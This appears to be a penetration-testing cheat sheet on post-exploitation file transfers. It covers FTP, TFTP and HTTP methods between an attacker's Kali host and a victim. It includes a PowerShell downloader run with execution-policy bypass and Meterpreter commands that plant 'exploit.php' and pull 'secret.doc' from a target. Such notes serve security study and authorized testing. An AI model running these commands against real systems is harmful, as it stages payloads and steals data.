10.6 : Web app exploitation - File transfers

Common File Transfers Method

Http

  • Use nginx / apache for the service

FTP

-
setup ftp server by python-pyftpdlib

cd /var/yourdir
python -m python-pyftpdlib -p 21

-
Windows or Linux both acceptable

echo open [kali ip] 21> ftp.txt
echo USER anonymous>> ftp.txt # username
echo pass>> ftp.txt # password
echo bin>> ftp.txt # binary mode
echo GET [file]>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

TFTP

  • Windows XP, 2003

  • Windows 7 or later need to be installed manually.

  • Attack side
    mkdir /tftp
    atftpd –daemon –port 69 /tftp

  • victim
    tftp -i $SrcIP get $filePath

Linux

  • wget
  • curl
  • ftp

Windows

  • ftp
  • powershell
    echo $storageDir = $pwd >wget.ps1
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1
    echo $url = “http://[kali ip]/[file]” >>wget.ps1
    echo $file = “[file]” >>wget.ps1
    echo $webclient.DownloadFile($url,$file) >>wget.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Metasploit

  • need to get shell on the machine first

  • then use meterpreter by sessions command

    upload /var/www/html/exploit.php c:\Users\IEUser\exploit.php
    download c:\Users\IEUser\secret.doc /var/www/html/secret.doc